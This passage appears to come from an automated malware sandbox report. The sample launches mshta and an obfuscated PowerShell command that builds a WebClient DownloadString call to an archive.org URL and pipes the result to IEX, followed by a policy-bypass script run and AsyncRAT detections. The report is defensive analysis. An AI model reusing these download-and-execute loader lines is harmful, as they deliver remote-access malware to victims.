                                                                                                                                                                                                                  Jun 11, 2021 06:35:40.225353956 CEST53557088.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:35:41.274629116 CEST5680353192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:35:41.334985971 CEST53568038.8.8.8192.168.2.3

DNS Queries

| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
|---|---|---|---|---|---|---|---|
| Jun 11, 2021 06:34:00.302654982 CEST | 192.168.2.3 | 8.8.8.8 | 0xa7b8 | Standard query (0) | ia601502.us.archive.org | A (IP address) | IN (0x0001) |
| Jun 11, 2021 06:34:05.073461056 CEST | 192.168.2.3 | 8.8.8.8 | 0x7a3b | Standard query (0) | ia601509.us.archive.org | A (IP address) | IN (0x0001) |
| Jun 11, 2021 06:34:21.809737921 CEST | 192.168.2.3 | 8.8.8.8 | 0x3460 | Standard query (0) | ia601406.us.archive.org | A (IP address) | IN (0x0001) |
| Jun 11, 2021 06:34:22.730957031 CEST | 192.168.2.3 | 8.8.8.8 | 0xc597 | Standard query (0) | archive.org | A (IP address) | IN (0x0001) |
| Jun 11, 2021 06:34:23.659003973 CEST | 192.168.2.3 | 8.8.8.8 | 0xfc0b | Standard query (0) | ia803408.us.archive.org | A (IP address) | IN (0x0001) |

DNS Answers

| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
|---|---|---|---|---|---|---|---|---|---|
| Jun 11, 2021 06:34:00.373203039 CEST | 8.8.8.8 | 192.168.2.3 | 0xa7b8 | No error (0) | ia601502.us.archive.org | | 207.241.227.112 | A (IP address) | IN (0x0001) |
| Jun 11, 2021 06:34:05.136739016 CEST | 8.8.8.8 | 192.168.2.3 | 0x7a3b | No error (0) | ia601509.us.archive.org | | 207.241.227.119 | A (IP address) | IN (0x0001) |
| Jun 11, 2021 06:34:21.880702019 CEST | 8.8.8.8 | 192.168.2.3 | 0x3460 | No error (0) | ia601406.us.archive.org | | 207.241.227.126 | A (IP address) | IN (0x0001) |
| Jun 11, 2021 06:34:22.794511080 CEST | 8.8.8.8 | 192.168.2.3 | 0xc597 | No error (0) | archive.org | | 207.241.224.2 | A (IP address) | IN (0x0001) |
| Jun 11, 2021 06:34:23.723062992 CEST | 8.8.8.8 | 192.168.2.3 | 0xfc0b | No error (0) | ia803408.us.archive.org | | 207.241.232.198 | A (IP address) | IN (0x0001) |

HTTPS Packets

Each connection row lists the server (leaf) certificate; the indented rows beneath it are the rest of the presented chain (intermediate and root certificates), as in the original report layout.

| Timestamp | Source IP | Source Port | Dest IP | Dest Port | Subject | Issuer | Not Before | Not After | JA3 SSL Client Fingerprint | JA3 SSL Client Digest |
|---|---|---|---|---|---|---|---|---|---|---|
| Jun 11, 2021 06:34:00.820400953 CEST | 207.241.227.112 | 443 | 192.168.2.3 | 49715 | CN=*.us.archive.org, OU=Domain Control Validated | CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US | Mon Dec 23 14:16:32 CET 2019 | Mon Feb 21 23:56:17 CET 2022 | 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0 | 37f463bf4616ecd445d4a1937da06e19 |
| | | | | | CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US | CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US | Tue May 03 09:00:00 CEST 2011 | Sat May 03 09:00:00 CEST 2031 | | |
| | | | | | CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US | OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US | Wed Jan 01 08:00:00 CET 2014 | Fri May 30 09:00:00 CEST 2031 | | |
| | | | | | OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US | OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US | Tue Jun 29 19:06:20 CEST 2004 | Thu Jun 29 19:06:20 CEST 2034 | | |
| Jun 11, 2021 06:34:05.587261915 CEST | 207.241.227.119 | 443 | 192.168.2.3 | 49719 | CN=*.us.archive.org, OU=Domain Control Validated | CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US | Mon Dec 23 14:16:32 CET 2019 | Mon Feb 21 23:56:17 CET 2022 | 769,49162-49161-49172-49171-53-47-10,0-10-11-35-23-65281,29-23-24,0 | 54328bd36c14bd82ddaa0c04b25ed9ad |
| | | | | | CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US | CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US | Tue May 03 09:00:00 CEST 2011 | Sat May 03 09:00:00 CEST 2031 | | |
| | | | | | CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US | OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US | Wed Jan 01 08:00:00 CET 2014 | Fri May 30 09:00:00 CEST 2031 | | |
| | | | | | OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US | OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US | Tue Jun 29 19:06:20 CEST 2004 | Thu Jun 29 19:06:20 CEST 2034 | | |
| Jun 11, 2021 06:34:22.297117949 CEST | 207.241.227.126 | 443 | 192.168.2.3 | 49727 | CN=*.us.archive.org, OU=Domain Control Validated | CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US | Mon Dec 23 14:16:32 CET 2019 | Mon Feb 21 23:56:17 CET 2022 | 769,49162-49161-49172-49171-53-47-10,0-10-11-35-23-65281,29-23-24,0 | 54328bd36c14bd82ddaa0c04b25ed9ad |
| | | | | | CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US | CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US | Tue May 03 09:00:00 CEST 2011 | Sat May 03 09:00:00 CEST 2031 | | |
| | | | | | CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US | OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US | Wed Jan 01 08:00:00 CET 2014 | Fri May 30 09:00:00 CEST 2031 | | |
| | | | | | OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US | OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US | Tue Jun 29 19:06:20 CEST 2004 | Thu Jun 29 19:06:20 CEST 2034 | | |
| Jun 11, 2021 06:34:23.208666086 CEST | 207.241.224.2 | 443 | 192.168.2.3 | 49728 | CN=*.archive.org, OU=Domain Control Validated | CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US | Mon Dec 23 14:16:33 CET 2019 | Mon Feb 21 23:56:08 CET 2022 | 769,49162-49161-49172-49171-53-47-10,0-10-11-35-23-65281,29-23-24,0 | 54328bd36c14bd82ddaa0c04b25ed9ad |
| | | | | | CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US | CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US | Tue May 03 09:00:00 CEST 2011 | Sat May 03 09:00:00 CEST 2031 | | |
| | | | | | CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US | OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US | Wed Jan 01 08:00:00 CET 2014 | Fri May 30 09:00:00 CEST 2031 | | |
| | | | | | OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US | OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US | Tue Jun 29 19:06:20 CEST 2004 | Thu Jun 29 19:06:20 CEST 2034 | | |
| Jun 11, 2021 06:34:24.134897947 CEST | 207.241.232.198 | 443 | 192.168.2.3 | 49729 | CN=*.us.archive.org, OU=Domain Control Validated | CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US | Mon Dec 23 14:16:32 CET 2019 | Mon Feb 21 23:56:17 CET 2022 | 769,49162-49161-49172-49171-53-47-10,0-10-11-35-23-65281,29-23-24,0 | 54328bd36c14bd82ddaa0c04b25ed9ad |
| | | | | | CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US | CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US | Tue May 03 09:00:00 CEST 2011 | Sat May 03 09:00:00 CEST 2031 | | |
| | | | | | CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US | OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US | Wed Jan 01 08:00:00 CET 2014 | Fri May 30 09:00:00 CEST 2031 | | |
| | | | | | OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US | OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US | Tue Jun 29 19:06:20 CEST 2004 | Thu Jun 29 19:06:20 CEST 2034 | | |

Code Manipulations

Statistics

Behavior

System Behavior

General

Start time:06:33:57
Start date:11/06/2021
Path:C:\Users\user\Desktop\xGrfj8RvYg.exe
Wow64 process (32bit):false
Commandline:'C:\Users\user\Desktop\xGrfj8RvYg.exe'
Imagebase:0x8c0000
File size:20480 bytes
MD5 hash:722603AA75534BEC9D1191F062FB2C03
Has elevated privileges:true
Has administrator privileges:true
Programmed in:.Net C# or VB.NET
Reputation:low

General

Start time:06:33:58
Start date:11/06/2021
Path:C:\Windows\System32\mshta.exe
Wow64 process (32bit):false
Commandline:'C:\Windows\System32\mshta.exe' https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txt
Imagebase:0x7ff645c70000
File size:14848 bytes
MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000002.00000003.214415545.00000208942AB000.00000004.00000001.sdmp, Author: Florian Roth
• Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000002.00000002.217899024.0000020893D10000.00000004.00000001.sdmp, Author: Florian Roth
• Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000002.00000002.218422171.00000208942AD000.00000004.00000001.sdmp, Author: Florian Roth
Reputation:moderate

General

Start time:06:34:01
Start date:11/06/2021
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT ='https://ia601509.us.archive.org/21/items/all-lol-123_20210603/ALL_lol123.TXT';$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS='Down^^^^^^^^^^^^^string'.Replace('^^^^^^^^^^^^^','load');$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO = 'WebBANKnt'.Replace('BANK','Clie');$T4RDTHFTJGJKHL='WFt'.Replace('WF','NE');$EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE='(NewYEAe'.Replace('YEA','-Obj');$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF='ct System.$T4RDTHFTJGJKHL.$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO).$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS($TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT)';I`E`X ($EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE,$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF -Join '')|I`E`X
Imagebase:0x7ff785e30000
File size:447488 bytes
MD5 hash:95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:true
Has administrator privileges:true
Programmed in:.Net C# or VB.NET
Reputation:high

General

Start time:06:34:02
Start date:11/06/2021
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6b2800000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:06:34:34
Start date:11/06/2021
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windo 1 -noexit -exec bypass -file C:\Users\Public\-----Run+++++++++.ps1
Imagebase:0x7ff785e30000
File size:447488 bytes
MD5 hash:95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:true
Has administrator privileges:true
Programmed in:.Net C# or VB.NET
Reputation:high

General

Start time:06:34:49
Start date:11/06/2021
Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Wow64 process (32bit):true
Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Imagebase:0x780000
File size:55400 bytes
MD5 hash:17CC69238395DF61AAF483BCEF02E7C9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:.Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000017.00000000.310047645.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000017.00000002.467029735.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000017.00000002.470750040.0000000002BE1000.00000004.00000001.sdmp, Author: Joe Security
Reputation:moderate

General

Start time:06:35:09
Start date:11/06/2021
Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Wow64 process (32bit):true
Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Imagebase:0xa70000
File size:55400 bytes
MD5 hash:17CC69238395DF61AAF483BCEF02E7C9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:.Net C# or VB.NET
Reputation:moderate

Disassembly

Code Analysis
